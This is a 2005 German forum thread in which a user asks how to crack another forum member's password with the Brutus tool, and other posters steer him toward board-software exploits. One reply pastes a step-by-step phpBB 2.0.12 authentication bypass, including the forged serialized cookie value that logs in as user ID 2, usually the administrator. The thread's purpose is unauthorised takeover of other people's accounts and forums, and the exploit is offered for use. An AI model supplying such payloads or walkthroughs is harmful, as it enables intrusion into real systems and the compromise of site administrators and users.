Forum Mitglied das Passwort herausfinden mit Brutus

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von themark, 21. April 2005 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 21. April 2005
    Hallo!
    Ich habe schon den Tutorial probiert,indem man mit Brutus ein passwoort rausfidnen von einem forum mitglied kann,aber es geht nciht kann mir einer irgendwer es nochmal ausführlicher erklären ?

    mfg themark
     
  3. 22. April 2005
    kommt drauf an:

    wen das PW nur aus zahlen oder nur aus Buchstaben besteht dann kannst du ein 4 seliges PW innerhalb von 10 Stunde cracken.

    Wen das aber eine Mischung aus Zahlen-Buchstaben hast dauert es enorm länger.
     
  4. 24. April 2005
    ok,aber kannst du mir jetzt schritt für sdchritt erklären was ich im brutus eingebn muss


    weil bei mir hupft er gleich auf 100 prozent aber daas passwort stimmt nicht

    bekommst dann ne 10ner bewertung einmal!
     
  5. 24. April 2005
    ich würde sagen brutus kannst du fast vergessen, bei mehr als 4 stellen rechnet dein pc mehrere tage um alle kombinationen abzuchecken.
     
  6. 25. April 2005
    ja aber kan mri wer es erklären wie das mit brutus geht ein forum hacken ?????

    mitglied passwort herausfinden !


    10 ner bewweertung für ne gute anleitung








    ähm aber ein anderes programm gibt es ned wie brutus oder doch ?
     
  7. 25. April 2005
    Brutus - Bitte helfen

    schau mal da, ich glaub arg viel mehr kann mann nicht dazu sagen
     
  8. 25. April 2005
    Also, wenn du wirklich nen Forum Hacken willst, solltest du es Lieber über Serverlücken versuchen, als über das Passwort von Usern.

    Du kannst Wochen dransitzen.

    Sagen wir das Passwort "h3ld3ns3in" .. <-- da brauchst sicher 4 Monate (kommt auf Connection und CPU LEistung druf an)

    Und dann gibts noch Foren, wo du nach 3-maligem Falschen eingeben ne Stunde warten musst!
     
  9. 25. April 2005
    exploide einfach das board, das geht in einer minute.
     
  10. 25. April 2005
    hmm schon wieder forum hacken

    ich glaub immernoch dass du Mark bist..

    ERINNERUNG: der admin rechte hier will um crack zu löschen doer irgendwas..weisnet du bist mir verdächtig
     
  11. 25. April 2005
    ^ähm was meinst du mit "exploide einfach das board" ?


    und wie geht das ?




    ich bin ned der mark ich bin der theamrk komm aus österreich niederösterreich
     
  12. 26. April 2005
    such dir nen wbb2 exploidt --> google und verwende ihn dann, jeder epxploidt is anders, cookiexploids sind am einfachsten. In 5 mins hast du so nen adminlogin.

    Ach fals du RR hacken willst... das geht net, hier sind die sicherheitslücken geschlossen //// hoffe ich -_- \\\\
     
  13. 26. April 2005
    das is dieser dumme holzkrüppel nap der hier admin werden wollte

    edit:
    3psil0n war wieder schneller
     
  14. 26. April 2005
    hmm ich will aber wbblite exploidt gibt es sowas ???
    wenn ja bitte mehrere inforamtionen pro user 10 ner bewertugn wenn er es mir besse r erklärt
     
  15. 27. April 2005
    ich such dir einen .... mom

    hier schon mal ein phpbb2 cookie explidt [sehr simpel und schnell!!] :

    Code:
    Posted: Mon Mar 07, 2005 7:40 am Post subject: PHPBB 2.0.12 Exploit - step by step walk through. 
 
This exploit allows an attacker to login as any use on a phpbb 2.0.12 
-You will need a mozilla client, such as Firefox 
-And LiveHTTP Headers plugin for FireFox Here 

This exploit works because the sessions file utilizes a == instead of a === on autocheckid return, this allows you to return a true boolean. 
This was probably a typo, or a real bad mistake by phpbb. 

Whats to do: 
Go to a forum and open the forum index then go into tools > Live HTTP Headers > then click reload. Once the page is reloaded, go into Live HTTP Headers window, scroll all the way to the top where the first packet is. Then click replay. ScreenShot 

In the packet will be thefollowing data 
Code: 
Host: www.phpbb.com 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip,deflate 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 
Keep-Alive: 300 
Connection: keep-alive 
Cookie: phpbb2support_data=a%3A0%3A%7B%7D 


On this line 
Cookie: phpbb2support_data=a%3A0%3A%7B%7D 
Replace the a%3A0%3A%7B%7D with 
Code: 
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D 

and then click "reload". 

after the page has reloaded you should be logged in a user number 2 , which is usually the administrators id number.
     
  16. 27. April 2005
    ich brauch aber einen für woltlab forum lite wenn es ned gibt sowas für diese version dann eifnach erklären wie man ein forum hackt..
     
  17. Video Script

    Videos zum Thema